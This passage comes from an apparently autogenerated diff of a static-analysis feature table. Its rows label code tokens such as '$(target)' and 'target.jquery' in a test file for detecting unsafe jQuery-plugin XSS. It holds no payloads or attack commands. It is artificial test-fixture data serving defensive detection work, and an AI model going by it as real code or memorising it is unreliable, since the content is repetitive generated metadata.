options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:48:4:48:4 | $ | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:48:4:48:4 | $ | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:48:4:48:4 | $ | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:48:4:48:12 | $(target) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:48:4:48:12 | $(target) | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:48:4:48:12 | $(target) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:48:4:48:12 | $(target) | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:48:4:48:12 | exceptional return of $(target) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:48:4:48:12 | exceptional return of $(target) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:48:4:48:12 | exceptional return of $(target) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:48:4:48:12 | exceptional return of $(target) | fileImports | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:48:6:48:11 | target | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:48:6:48:11 | target | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:48:6:48:11 | target | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:48:6:48:11 | target | contextSurroundingFunctionParameters | ()\n(options) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:48:6:48:11 | target | enclosingFunctionName | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:48:6:48:11 | target | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:51:7:51:20 | !target.jquery | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:51:7:51:20 | !target.jquery | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:51:7:51:20 | !target.jquery | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:51:7:51:20 | !target.jquery | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:51:8:51:13 | target | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:51:8:51:13 | target | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:51:8:51:13 | target | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:51:8:51:13 | target | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:51:8:51:20 | target.jquery | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:51:8:51:20 | target.jquery | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:51:8:51:20 | target.jquery | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:51:8:51:20 | target.jquery | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:51:15:51:20 | jquery | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:51:15:51:20 | jquery | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:51:15:51:20 | jquery | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:51:15:51:20 | jquery | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:52:4:52:4 | $ | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:52:4:52:4 | $ | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:52:4:52:4 | $ | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:52:4:52:4 | $ | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:52:4:52:12 | $(target) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:52:4:52:12 | $(target) | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:52:4:52:12 | $(target) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:52:4:52:12 | $(target) | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:52:4:52:12 | exceptional return of $(target) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:52:4:52:12 | exceptional return of $(target) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:52:4:52:12 | exceptional return of $(target) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:52:4:52:12 | exceptional return of $(target) | fileImports | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:52:6:52:11 | target | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:52:6:52:11 | target | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:52:6:52:11 | target | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:52:6:52:11 | target | contextSurroundingFunctionParameters | ()\n(options) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:52:6:52:11 | target | enclosingFunctionName | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:52:6:52:11 | target | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:54:4:54:4 | $ | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:54:4:54:4 | $ | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:54:4:54:4 | $ | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:54:4:54:4 | $ | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:54:4:54:12 | $(target) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:54:4:54:12 | $(target) | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:54:4:54:12 | $(target) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:54:4:54:12 | $(target) | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:54:4:54:12 | exceptional return of $(target) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:54:4:54:12 | exceptional return of $(target) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:54:4:54:12 | exceptional return of $(target) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:54:4:54:12 | exceptional return of $(target) | fileImports | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:54:6:54:11 | target | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:54:6:54:11 | target | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:54:6:54:11 | target | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:54:6:54:11 | target | contextSurroundingFunctionParameters | ()\n(options) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:54:6:54:11 | target | enclosingFunctionName | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:54:6:54:11 | target | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:57:7:57:21 | !!target.jquery | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:57:7:57:21 | !!target.jquery | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:57:7:57:21 | !!target.jquery | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:57:7:57:21 | !!target.jquery | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:57:8:57:21 | !target.jquery | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:57:8:57:21 | !target.jquery | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:57:8:57:21 | !target.jquery | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:57:8:57:21 | !target.jquery | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:57:9:57:14 | target | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:57:9:57:14 | target | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:57:9:57:14 | target | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:57:9:57:14 | target | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:57:9:57:21 | target.jquery | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:57:9:57:21 | target.jquery | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:57:9:57:21 | target.jquery | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:57:9:57:21 | target.jquery | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:57:16:57:21 | jquery | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:57:16:57:21 | jquery | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:57:16:57:21 | jquery | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:57:16:57:21 | jquery | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:58:4:58:4 | $ | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:58:4:58:4 | $ | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:58:4:58:4 | $ | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:58:4:58:4 | $ | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:58:4:58:12 | $(target) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:58:4:58:12 | $(target) | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:58:4:58:12 | $(target) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:58:4:58:12 | $(target) | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:58:4:58:12 | exceptional return of $(target) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:58:4:58:12 | exceptional return of $(target) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:58:4:58:12 | exceptional return of $(target) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:58:4:58:12 | exceptional return of $(target) | fileImports | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:58:6:58:11 | target | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:58:6:58:11 | target | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:58:6:58:11 | target | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:58:6:58:11 | target | contextSurroundingFunctionParameters | ()\n(options) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:58:6:58:11 | target | enclosingFunctionName | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:58:6:58:11 | target | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:60:4:60:4 | $ | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:60:4:60:4 | $ | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:60:4:60:4 | $ | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:60:4:60:4 | $ | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:60:4:60:12 | $(target) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:60:4:60:12 | $(target) | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:60:4:60:12 | $(target) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:60:4:60:12 | $(target) | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:60:4:60:12 | exceptional return of $(target) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:60:4:60:12 | exceptional return of $(target) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:60:4:60:12 | exceptional return of $(target) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:60:4:60:12 | exceptional return of $(target) | fileImports | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:60:6:60:11 | target | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:60:6:60:11 | target | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:60:6:60:11 | target | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:60:6:60:11 | target | contextSurroundingFunctionParameters | ()\n(options) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:60:6:60:11 | target | enclosingFunctionName | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:60:6:60:11 | target | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:65:2:65:2 | $ | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:65:2:65:2 | $ | contextSurroundingFunctionParameters | () | +| 